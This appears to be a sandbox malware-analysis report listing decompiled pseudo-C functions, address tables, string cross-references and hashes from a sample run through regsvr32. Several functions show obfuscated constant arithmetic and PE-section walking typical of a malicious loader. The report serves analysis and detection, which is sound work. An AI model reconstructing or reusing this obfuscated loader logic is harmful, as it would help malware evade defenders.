0x003c9614
0x003c961c
0x003c9624
0x003c962c
0x003c9634
0x003c9640
0x003c9645
0x003c964f
0x003c9652
0x003c9656
0x003c966d
0x003c9672
0x003c9675
0x003c9678
0x003c967c
0x003c9681
0x00000000
0x003c9451
0x003c9457
0x003c946c
0x003c9476
0x003c947e
0x003c9486
0x003c9494
0x003c9495
0x003c949b
0x003c94a0
0x003c94a8
0x003c94b0
0x003c94b8
0x003c94c5
0x003c94c9
0x003c94d1
0x003c94d9
0x003c94dd
0x003c94e5
0x003c94ea
0x003c94ed
0x003c94f0
0x003c94f2
0x003c94f8
0x003c9500
0x003c9508
0x003c9510
0x003c9518
0x003c9520
0x003c9528
0x003c953d
0x003c9542
0x003c954c
0x003c9552
0x003c9557
0x003c955d
0x003c9565
0x003c9571
0x003c9576
0x003c957c
0x003c9588
0x003c958b
0x003c958f
0x003c9597
0x003c959f
0x003c95a7
0x003c95af
0x003c95b7
0x003c95bc
0x003c95d7
0x003c95dc
0x003c95df
0x003c942d
0x003c942d
0x003c942d
0x003c9432
0x003c9434
0x00000000
0x003c9434
0x003c942d
0x003c9459
0x003c945f
0x00000000
0x003c9465
0x003c9465
0x00000000
0x003c9465
0x003c945f
0x003c9457
0x003c944b
0x00000000
0x003c943f
0x003c9736
0x003c973e
0x003c9746
0x003c974e
0x003c9756
0x003c975e
0x003c9766
0x003c976e
0x003c9776
0x003c977e
0x003c9783
0x003c978b
0x003c9793
0x003c9793
0x003c9793
0x003c97aa
0x003c97b3
0x003c97b8
0x003c97bd
0x003c97be
0x003c97be
0x003c97be
0x003c97d1
0x003c97d1
0x003c97d1
0x003c9432

Strings

+A., xrefs: 003C954C
zMw, xrefs: 003C9614
;, xrefs: 003C9656
)hA, xrefs: 003C9689
fv<, xrefs: 003C95F3

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )hA$+A.$;$fv<$zMw
API String ID: 0-706932074
Opcode ID: 3dc084124cff98bec4ddf028135da469af2520a5dd0043987128ca917b208171
Instruction ID: 7eadbaa233516d03a2f5107b0b79682b28780d2ff279729cf2b4fa6dc6a16b35
Opcode Fuzzy Hash: 3dc084124cff98bec4ddf028135da469af2520a5dd0043987128ca917b208171
Instruction Fuzzy Hash: 689176B19083029BC309CF24D54991BFBE1FBD4748F104A2EF489AA261D7B5CA59CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 003DDC64 Relevance: 6.4, Strings: 5, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003DDC64(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* _t195;
				void* _t198;
				intOrPtr _t207;
				void* _t217;
				signed int _t224;
				void* _t244;
				intOrPtr* _t247;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_push(0);
				_push( *((intOrPtr*)(_t251 + 0x48)));
				_t247 = __ecx;
				_push( *((intOrPtr*)(_t251 + 0x48)));
				 *((intOrPtr*)(_t251 + 0x34)) = __ecx;
				_push(__edx);
				_push(__ecx);
				E003C2528(_t195);
				 *((intOrPtr*)(_t251 + 0x40)) = 0x35ea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				 *(_t251 + 0x20) = 0x409789;
				 *(_t251 + 0x20) =  *(_t251 + 0x20) >> 0xc;
				 *(_t251 + 0x20) =  *(_t251 + 0x20) >> 0xf;
				 *(_t251 + 0x20) =  *(_t251 + 0x20) >> 0xa;
				 *(_t251 + 0x20) =  *(_t251 + 0x20) ^ 0x0000d31b;
				 *(_t251 + 0x2c) = 0x9988eb;
				 *(_t251 + 0x2c) =  *(_t251 + 0x2c) >> 0xb;
				 *(_t251 + 0x2c) =  *(_t251 + 0x2c) >> 4;
				 *(_t251 + 0x2c) =  *(_t251 + 0x2c) ^ 0x000706a8;
				 *(_t251 + 0x30) = 0x82a9ab;
				 *(_t251 + 0x30) =  *(_t251 + 0x30) + 0xed1c;
				 *(_t251 + 0x30) =  *(_t251 + 0x30) << 0xe;
				 *(_t251 + 0x30) =  *(_t251 + 0x30) ^ 0xe5b2701d;
				_t198 = E003C505C( *((intOrPtr*)(_t251 + 0x24)),  *(_t251 + 0x30), __ecx,  *(_t251 + 0x30));
				_t244 = _t198;
				_t252 = _t251 + 0x1c;
				if(_t244 != 0) {
					 *(_t252 + 0x1c) = 0x3e8db3;
					 *(_t252 + 0x1c) =  *(_t252 + 0x1c) + 0x9dd0;
					 *(_t252 + 0x1c) =  *(_t252 + 0x1c) + 0xe10d;
					 *(_t252 + 0x1c) =  *(_t252 + 0x1c) << 6;
					 *(_t252 + 0x1c) =  *(_t252 + 0x1c) ^ 0x10033400;
					 *(_t252 + 0x18) = 0x70fba;
					 *(_t252 + 0x18) =  *(_t252 + 0x18) | 0x0d940892;
					 *(_t252 + 0x18) =  *(_t252 + 0x18) + 0x2c6f;
					 *(_t252 + 0x18) =  *(_t252 + 0x18) << 0xc;
					 *(_t252 + 0x18) =  *(_t252 + 0x18) ^ 0x73c2b000;
					 *(_t252 + 0x10) = 0x4b594f;
					 *(_t252 + 0x10) =  *(_t252 + 0x10) | 0x4e01cc25;
					 *(_t252 + 0x10) =  *(_t252 + 0x10) + 0xffff2075;
					 *(_t252 + 0x10) =  *(_t252 + 0x10) | 0x464dab1f;
					 *(_t252 + 0x10) =  *(_t252 + 0x10) ^ 0x4e4fffbf;
					 *(_t252 + 0x24) = 0xf238e;
					 *(_t252 + 0x24) =  *(_t252 + 0x24) | 0xe9967d76;
					 *(_t252 + 0x24) =  *(_t252 + 0x24) ^ 0xe994c679;
					 *(_t252 + 0x20) = 0x43367;
					 *(_t252 + 0x20) =  *(_t252 + 0x20) << 0x10;
					 *(_t252 + 0x20) =  *(_t252 + 0x20) ^ 0x336e445c;
					 *(_t252 + 0x14) = 0xc435b9;
					 *(_t252 + 0x14) =  *(_t252 + 0x14) << 7;
					 *(_t252 + 0x14) =  *(_t252 + 0x14) << 6;
					 *(_t252 + 0x14) =  *(_t252 + 0x14) | 0x176f1289;
					 *(_t252 + 0x14) =  *(_t252 + 0x14) ^ 0x97fce269;
					 *(_t252 + 0xc) = 0xf74afc;
					 *(_t252 + 0xc) =  *(_t252 + 0xc) | 0x96780cd9;
					 *(_t252 + 0xc) =  *(_t252 + 0xc) ^ 0xf4619879;
					 *(_t252 + 0xc) =  *(_t252 + 0xc) + 0xffffef11;
					 *(_t252 + 0xc) =  *(_t252 + 0xc) ^ 0x629a6558;
					_t89 = _t252 + 0x20; // 0x336e445c
					_t217 = E003C221B( *(_t252 + 0x30) |  *(_t252 + 0x38),  *((intOrPtr*)(_t244 + 0x50)),  *(_t252 + 0x38),  *(_t252 + 0x30),  *_t89,  *(_t252 + 0x18),  *(_t252 + 0x10));
					_t253 = _t252 + 0x18;
					if(_t217 == 0) {
						L4:
						return _t217;
					}
					 *(_t253 + 0x28) = 0x4a971f;
					 *(_t253 + 0x2c) =  *(_t253 + 0x28) * 0x31;
					 *(_t253 + 0x2c) =  *(_t253 + 0x2c) ^ 0x0e4537a4;
					 *(_t253 + 0x1c) = 0xae6fd7;
					_t224 = 0x79;
					 *(_t253 + 0x18) =  *(_t253 + 0x1c) / _t224;
					 *(_t253 + 0x18) =  *(_t253 + 0x18) << 0x10;
					 *(_t253 + 0x18) =  *(_t253 + 0x18) ^ 0x7104c76a;
					 *(_t253 + 0x20) = 0x5f3fd2;
					 *(_t253 + 0x20) =  *(_t253 + 0x20) + 0xffff6e3e;
					 *(_t253 + 0x20) =  *(_t253 + 0x20) * 0x3b;
					 *(_t253 + 0x20) =  *(_t253 + 0x20) >> 3;
					 *(_t253 + 0x20) =  *(_t253 + 0x20) ^ 0x02bbd7d6;
					 *(_t253 + 0x1c) = 0x5327a6;
					 *(_t253 + 0x1c) =  *(_t253 + 0x1c) | 0x6071c8ae;
					 *(_t253 + 0x1c) =  *(_t253 + 0x1c) >> 0xe;
					 *(_t253 + 0x1c) =  *(_t253 + 0x1c) ^ 0x00015577;
					E003DF4FB( *((intOrPtr*)(_t253 + 0x3c)),  *_t247,  *(_t253 + 0x28), _t217,  *(_t253 + 0x28),  *((intOrPtr*)(_t244 + 0x54)),  *(_t253 + 0x1c));
					_t254 = _t253 + 0x14;
					_t250 = ( *(_t244 + 0x14) & 0x0000ffff) + 0x18 + _t244;
					_t207 = ( *(_t244 + 6) & 0x0000ffff) * 0x28 + _t250;
					 *((intOrPtr*)(_t254 + 0x24)) = _t207;
					if(_t250 >= _t207) {
						goto L4;
					} else {
						goto L3;
					}
					do {
						L3:
						 *(_t254 + 0x28) = 0x7a;
						_t227 =  <  ?  *((void*)(_t250 + 8)) :  *((intOrPtr*)(_t250 + 0x10));
						 *(_t254 + 0x20) = 0xe4ea5c;
						 *(_t254 + 0x20) =  *(_t254 + 0x20) << 6;
						 *(_t254 + 0x28) = 0x7b;
						 *(_t254 + 0x20) =  *(_t254 + 0x20) /  *(_t254 + 0x28);
						 *(_t254 + 0x20) =  *(_t254 + 0x20) + 0xffff3dc8;
						 *(_t254 + 0x20) =  *(_t254 + 0x20) ^ 0x0072fa45;
						 *(_t254 + 0x18) = 0x284491;
						 *(_t254 + 0x28) = 0x3e;
						 *(_t254 + 0x18) =  *(_t254 + 0x18) /  *(_t254 + 0x28);
						 *(_t254 + 0x18) =  *(_t254 + 0x18) ^ 0x2c517462;
						 *(_t254 + 0x18) =  *(_t254 + 0x18) ^ 0x2c54c8e9;
						 *(_t254 + 0x1c) = 0xe25300;
						 *(_t254 + 0x1c) =  *(_t254 + 0x1c) /  *(_t254 + 0x28);
						 *(_t254 + 0x1c) =  *(_t254 + 0x1c) + 0x98a6;
						 *(_t254 + 0x1c) =  *(_t254 + 0x1c) ^ 0x000ccb35;
						 *(_t254 + 0x28) = 0x11138f;
						 *(_t254 + 0x28) =  *(_t254 + 0x28) >> 0xc;
						 *(_t254 + 0x28) =  *(_t254 + 0x28) ^ 0x000666c5;
						E003DF4FB( *((intOrPtr*)(_t254 + 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t254 + 0x2c)))) +  *((intOrPtr*)(_t250 + 0x14)),  *(_t254 + 0x28),  *((intOrPtr*)(_t250 + 0xc)) + _t217,  *((intOrPtr*)(_t254 + 0x24)),  <  ?  *((void*)(_t250 + 8)) :  *((intOrPtr*)(_t250 + 0x10)),  *(_t254 + 0x28));
						_t250 = _t250 + 0x28;
						_t254 = _t254 + 0x14;
					} while (_t250 <  *((intOrPtr*)(_t254 + 0x24)));
					goto L4;
				}
				return _t198;
			}

0x003ddc6a
0x003ddc6c
0x003ddc70
0x003ddc72
0x003ddc76
0x003ddc7a
0x003ddc7b
0x003ddc7c
0x003ddc81
0x003ddc8f
0x003ddc90
0x003ddc91
0x003ddc92
0x003ddc9a
0x003ddc9f
0x003ddca4
0x003ddca9
0x003ddcb1
0x003ddcb9
0x003ddcbe
0x003ddcc3
0x003ddccb
0x003ddcd3
0x003ddcdb
0x003ddce0
0x003ddcf5
0x003ddcfa
0x003ddcfc
0x003ddd01
0x003ddd07
0x003ddd0f
0x003ddd17
0x003ddd1f
0x003ddd24
0x003ddd2c
0x003ddd34
0x003ddd3c
0x003ddd44
0x003ddd49
0x003ddd51
0x003ddd59
0x003ddd61
0x003ddd69
0x003ddd71
0x003ddd79
0x003ddd81
0x003ddd89
0x003ddd91
0x003ddd99
0x003ddd9e
0x003ddda6
0x003dddae
0x003dddb3
0x003dddb8
0x003dddc0
0x003dddc8
0x003dddd0
0x003dddd8
0x003ddde0
0x003ddde8
0x003dddf9
0x003dde15
0x003dde17
0x003dde1c
0x003ddfc4
0x00000000
0x003ddfc6
0x003dde22
0x003dde33
0x003dde37
0x003dde3f
0x003dde4b
0x003dde4e
0x003dde52
0x003dde57
0x003dde5f
0x003dde67
0x003dde74
0x003dde78
0x003dde7d
0x003dde85
0x003dde8d
0x003dde95
0x003dde9a
0x003ddeb9
0x003ddec2
0x003ddecf
0x003dded1
0x003dded3
0x003dded9
0x00000000
0x00000000
0x00000000
0x00000000
0x003ddedf
0x003ddedf
0x003ddeeb
0x003ddefb
0x003ddf01
0x003ddf09
0x003ddf18
0x003ddf20
0x003ddf24
0x003ddf2c
0x003ddf34
0x003ddf46
0x003ddf4e
0x003ddf52
0x003ddf5a
0x003ddf62
0x003ddf74
0x003ddf78
0x003ddf80
0x003ddf88
0x003ddf90
0x003ddf95
0x003ddfaf
0x003ddfb4
0x003ddfb7
0x003ddfba
0x00000000
0x003ddedf
0x003ddfcd

Strings

>, xrefs: 003DDF46
5, xrefs: 003DDC81
\Dn3, xrefs: 003DDDF9
btQ,, xrefs: 003DDF52
OYK, xrefs: 003DDD51

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >$OYK$\Dn3$btQ,$5
API String ID: 0-2833747631
Opcode ID: 10e9e56bde9150cd0daefb6e42e4625f626e3dc4fd84ecd1535d94eb96e285ec
Instruction ID: 34c0d5ed90d564296054756e06986e81c45bf12b8db6e8324cebf1f03006d6eb
Opcode Fuzzy Hash: 10e9e56bde9150cd0daefb6e42e4625f626e3dc4fd84ecd1535d94eb96e285ec
Instruction Fuzzy Hash: 3A91FF714083419FC349DF25C88990BBBE1FFD8758F008A1DF59AA6261D3B9DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 003C192C Relevance: 6.4, Strings: 5, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003C192C(void* __eax, void* __ebx, signed int __ecx, signed int _a1, signed int _a5, signed int _a9, signed int _a13) {
				signed char _t98;
				signed char _t99;
				void* _t102;
				void* _t112;
				signed int _t117;
				signed int _t118;
				void* _t124;
				void* _t126;
				void* _t130;
				void* _t131;

				_t117 = __ecx;
				asm("adc [ebx+0x55], dl");
				_t98 = __eax + 1;
				es = _t126;
				_t114 = __ebx + _t98;
				_t131 = _t130 + 1;
				_t99 = _t98 & 0x00000018;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 4)) + __ecx;
				 *((intOrPtr*)(_t114 - 0x74e7db8c)) =  *((intOrPtr*)(__ebx + _t98 - 0x74e7db8c)) + __ecx;
				asm("lds edx, [edi-0x75]");
				asm("stc");
				do {
					while(_t99 != 0xa4ab) {
						if(_t99 == 0x740aa) {
							_t126 = 0;
							_t99 = 0x98bfd;
							continue;
						} else {
							if(_t99 == 0x9440a) {
								_a13 = 0xbffe9a;
								_a13 = _a13 >> 7;
								_a13 = _a13 + 0xeb35;
								_a13 = _a13 ^ 0x00055db2;
								_a9 = 0x572ce1;
								_t69 =  &_a9; // 0x572ce1
								_a9 =  *_t69 * 0x51;
								_a9 = _a9 + 0x7ffb;
								_a9 = _a9 ^ 0x1b94f006;
								_a5 = 0x3db2b1;
								_a5 = _a5 + 0x17b6;
								_a5 = _a5 << 9;
								_a5 = _a5 << 7;
								_a5 = _a5 ^ 0xca61c82f;
								_a1 = 0x1ecf69;
								_a1 = _a1 * 0x31;
								_a1 = _a1 * 0x14;
								_a1 = _a1 >> 0xd;
								_a1 = _a1 ^ 0x0004f66d;
								_t126 = _t126 + E003D9E05(_a13, _t124 + 4, _a9, _a5, _a1);
							} else {
								if(_t99 != 0x98bfd) {
									goto L10;
								} else {
									_a5 = 0x5a929e;
									_push(_t117);
									_a5 = _a5 * 7;
									_a5 = _a5 * 0x4d;
									_a5 = _a5 ^ 0xbeb49f89;
									_a1 = 0x40d952;
									_a1 = _a1 | 0xc57bc056;
									_a1 = _a1 + 0x2fb8;
									_a1 = _a1 | 0xb1615df1;
									_a1 = _a1 ^ 0xf57257ed;
									_t112 = E003C87EC();
									_t131 = _t131 + 4;
									_t126 = _t126 + _t112;
									_t99 = 0xa4ab;
									continue;
								}
							}
						}
						L13:
						return _t126;
					}
					_a1 = 0x492962;
					_a1 = _a1 + 0xc94f;
					_a1 = _a1 + 0xc690;
					_a1 = _a1 ^ 0x0dafc73b;
					_a1 = _a1 ^ 0x0de734bb;
					_a9 = 0x71b1ef;
					_a9 = _a9 << 1;
					_a9 = _a9 ^ 0x68021643;
					_a9 = _a9 ^ 0x68e439b6;
					_a13 = 0xf2bb2d;
					_a13 = _a13 + 0xffff7bd7;
					_a13 = _a13 ^ 0x00f29d65;
					_a5 = 0xc91955;
					_t118 = 6;
					_a5 = _a5 / _t118;
					_a5 = _a5 << 6;
					_a5 = _a5 ^ 0x0868bc19;
					_t117 = _a1;
					_t102 = E003D9E05(_t117, _t124 + 0x24, _a9, _a13, _a5);
					_t131 = _t131 + 0xc;
					_t126 = _t126 + _t102;
					_t99 = 0x9440a;
					L10:
				} while (_t99 != 0xf4605);
				goto L13;
			}

0x003c192c
0x003c192e
0x003c1934
0x003c1935
0x003c1936
0x003c1938
0x003c1939
0x003c193b
0x003c193e
0x003c1944
0x003c1947
0x003c194d
0x003c194d
0x003c195a
0x003c19d6
0x003c19d8
0x00000000
0x003c195c
0x003c1961
0x003c1a91
0x003c1a9c
0x003c1aa1
0x003c1aa9
0x003c1ab1
0x003c1ab9
0x003c1abe
0x003c1ac2
0x003c1aca
0x003c1ad2
0x003c1ada
0x003c1ae2
0x003c1ae7
0x003c1aec
0x003c1af4
0x003c1b01
0x003c1b0a
0x003c1b0e
0x003c1b13
0x003c1b33
0x003c1967
0x003c1969
0x00000000
0x003c196f
0x003c196f
0x003c197c
0x003c197d
0x003c1986
0x003c198a
0x003c1992
0x003c199a
0x003c19a2
0x003c19aa
0x003c19b2
0x003c19c2
0x003c19c7
0x003c19ca
0x003c19cc
0x00000000
0x003c19cc
0x003c1969
0x003c1961
0x003c1b35
0x003c1b3e
0x003c1b3e
0x003c19df
0x003c19e9
0x003c19f1
0x003c19f9
0x003c1a01
0x003c1a09
0x003c1a11
0x003c1a15
0x003c1a1d
0x003c1a25
0x003c1a2d
0x003c1a35
0x003c1a3d
0x003c1a4b
0x003c1a51
0x003c1a55
0x003c1a5a
0x003c1a6e
0x003c1a72
0x003c1a77
0x003c1a7a
0x003c1a7c
0x003c1a81
0x003c1a81
0x00000000

Strings

D, xrefs: 003C1A7C
,W, xrefs: 003C1AB9
D, xrefs: 003C195C
b)I, xrefs: 003C19DF
5, xrefs: 003C1AA1

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D$D$5$b)I$,W
API String ID: 0-1209757196
Opcode ID: e0e6ef04970bdaf167d31e445f6c285153cd7ea05a848a4ed49ac512d1ad3a05
Instruction ID: e972f0fd626bf4d7ec7e3250defac7ce3ba431ccbffa660a48f173320f610fc7
Opcode Fuzzy Hash: e0e6ef04970bdaf167d31e445f6c285153cd7ea05a848a4ed49ac512d1ad3a05
Instruction Fuzzy Hash: F95120B25083028BC345CF24E58A90BBBE0FBA5758F110D2EF495A6261D3B5CA5D9FD3

Uniqueness

Uniqueness Score: -1.00%

Function 100011EF Relevance: 6.2, APIs: 4, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E100011EF() {
				void* _t45;
				signed int _t47;
				signed int _t48;
				intOrPtr _t52;
				signed int _t74;
				intOrPtr _t83;
				void* _t85;
				signed int _t103;
				signed int _t110;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t137;
				signed int _t142;
				intOrPtr _t149;
				signed int _t151;
				void* _t153;
				signed int _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t181;
				void* _t190;
				void* _t191;

				_t165 =  *(_t190 + 8);
				if(_t165 != 0) {
					if( *((intOrPtr*)(_t165 + 0x10)) != 0) {
						_t151 =  *0x1008f218; // 0x0
						_t83 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x28)) - _t151 + _t151 + _t83))(_t83, 0, 0);
					}
					_t47 =  *0x1008f220; // 0x0
					_t115 =  *0x1008f224; // 0x0
					_t130 =  *0x1008f214; // 0x0
					_t5 = _t47 + 1; // 0x1
					_t118 =  *0x1008f218; // 0x0
					_t8 = _t118 + 1; // 0x1
					_t48 =  *0x1008f21c; // 0x0
					 *0x10092e0c(((_t115 * _t130 - _t5 *  *0x1008f228 - 1) * _t115 - (_t115 + _t47 * 2 << 1) + _t8 * _t47 + _t48 + _t48 * 2 - _t130 + _t118 << 4) +  *((intOrPtr*)(_t165 + 0x30)), _t153, _t166, _t85);
					_t191 = _t190 + 4;
					if( *((intOrPtr*)(_t165 + 8)) == 0) {
						L13:
						_t52 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)(_t191 + 0x14)) = _t52;
						if(_t52 != 0) {
							_t119 =  *0x1008f220; // 0x0
							_t160 =  *0x1008f224; // 0x0
							_t131 =  *0x1008f218; // 0x0
							_t132 =  *0x1008f214; // 0x0
							_t137 =  *0x1008f21c; // 0x0
							 *((intOrPtr*)(_t165 + 0x20))( *((intOrPtr*)(_t191 + 0x1c)), 0, (_t119 *  *0x1008f214 + _t131 + ( ~((_t119 * _t160 * _t131 + 1) *  *0x1008f228) << 0x1f) - (_t119 * _t160 * _t131 + 1) *  *0x1008f228 + 2) * _t131 + ((_t132 + 1) * _t160 + 1) *  *0x1008f228 + 0x4000 + _t137 * 4 + ( ~_t119 << 0x1f) - _t119 << 1,  *((intOrPtr*)(_t165 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t165);
					} else {
						_t120 =  *0x1008f21c; // 0x0
						_t103 =  *0x1008f228; // 0x0
						_t142 =  *0x1008f224; // 0x0
						_t161 = 0;
						_t13 = _t120 + 1; // 0x1
						if(( ~_t142 << 1) - _t13 * _t103 +  *((intOrPtr*)(_t165 + 0xc)) <= 0) {
							_t121 =  *0x1008f218; // 0x0
							_t74 =  *0x1008f220; // 0x0
							L12:
							_t27 = _t103 + 3; // 0x3
							_t28 = _t121 + 1; // 0x1
							 *0x10092e0c( *((intOrPtr*)(_t165 + 8)) + (((3 - _t121 + _t121) * _t103 - _t27 * _t121) * _t74 + _t28 * _t142 - _t103 + _t103 - _t121 + (_t28 * _t142 - _t103 + _t103 - _t121) * 2) * 4);
							_t191 = _t191 + 4;
							goto L13;
						}
						_t74 =  *0x1008f220; // 0x0
						do {
							_t181 =  *0x1008f214; // 0x0
							_t110 =  *0x1008f218; // 0x0
							_t149 =  *((intOrPtr*)(_t165 + 8));
							if( *((intOrPtr*)(_t149 + (_t161 + (_t74 * _t74 + _t120 + (_t181 + 1) * _t142 - (_t120 * _t120 * _t74 << 1) + _t110) * 4) * 4)) == 0) {
								_t142 =  *0x1008f224; // 0x0
							} else {
								 *((intOrPtr*)(_t165 + 0x2c))( *((intOrPtr*)(_t149 + (_t161 - (_t74 << 2)) * 4)),  *((intOrPtr*)(_t165 + 0x34)));
								_t142 =  *0x1008f224; // 0x0
								_t74 =  *0x1008f220; // 0x0
								_t120 =  *0x1008f21c; // 0x0
								_t191 = _t191 + 8;
							}
							_t24 = _t120 + 1; // 0x1
							_t161 = _t161 + 1;
						} while (_t161 < ( ~_t142 << 1) - _t24 *  *0x1008f228 +  *((intOrPtr*)(_t165 + 0xc)));
						_t103 =  *0x1008f228; // 0x0
						_t121 =  *0x1008f218; // 0x0
						goto L12;
					}
				}
				return _t45;
			}

0x100091b1
0x100091b7
0x100091c2
0x100091c6
0x100091cc
0x100091dd
0x100091dd
0x100091df
0x100091e4
0x100091ea
0x100091f3
0x1000920f
0x10009215
0x1000921b
0x10009234
0x1000923d
0x10009242
0x10009341
0x10009341
0x10009346
0x1000934a
0x1000934f
0x10009355
0x1000935e
0x1000938f
0x100093a3
0x100093c5
0x100093c8
0x00000000
0x10009248
0x10009248
0x1000924e
0x10009254
0x1000925a
0x1000925c
0x10009271
0x100093e0
0x100093e6
0x10009307
0x10009311
0x1000931f
0x10009338
0x1000933e
0x00000000
0x1000933e
0x10009277
0x1000927c
0x1000927e
0x1000929d
0x100092a8
0x100092af
0x100092d9
0x100092b1
0x100092c0
0x100092c3
0x100092c9
0x100092ce
0x100092d4
0x100092d4
0x100092df
0x100092f4
0x100092f7
0x100092fb
0x10009301
0x00000000
0x10009301
0x10009242
0x100093df

APIs

??3@YAXPAX@Z.MSVCRT ref: 10009234
??3@YAXPAX@Z.MSVCRT ref: 10009338
GetProcessHeap.KERNEL32(00000000,?), ref: 100093CE
HeapFree.KERNEL32(00000000), ref: 100093D5

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ??3@Heap$FreeProcess
String ID:
API String ID: 834397476-0
Opcode ID: 9d8e6c60b596d52eff5ea1ad0ed00c55f6a8de8ef0385c674def2060ee93f9a8
Instruction ID: d2448b74180ca22aa9fb69ea27277de50adffa4b00cc4abb782fd0ddb604d52f
Opcode Fuzzy Hash: 9d8e6c60b596d52eff5ea1ad0ed00c55f6a8de8ef0385c674def2060ee93f9a8
Instruction Fuzzy Hash: BB6182357443168FE319CF78EDC5A61B7EAFB88304B14822ED605CB2A5D670F952CB84

Uniqueness

Uniqueness Score: -1.00%

Function 10044296 Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10044296(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E100452DE(__ecx) & 0x40000000) != 0) {
					L6:
					return E10041EDF(_t12);
				}
				_t16 = E1000E8A5();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x10044299
0x100442a5
0x100442ed
0x00000000
0x100442ef
0x100442ac
0x100442b0
0x00000000
0x100442d3
0x100442e2
0x100442ea
0x00000000
0x100442ea

APIs

Part of subcall function 100452DE: GetWindowLongA.USER32(?,000000F0), ref: 100452EA

GetKeyState.USER32(00000010), ref: 100442BA
GetKeyState.USER32(00000011), ref: 100442C3
GetKeyState.USER32(00000012), ref: 100442CC
SendMessageA.USER32 ref: 100442E2

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
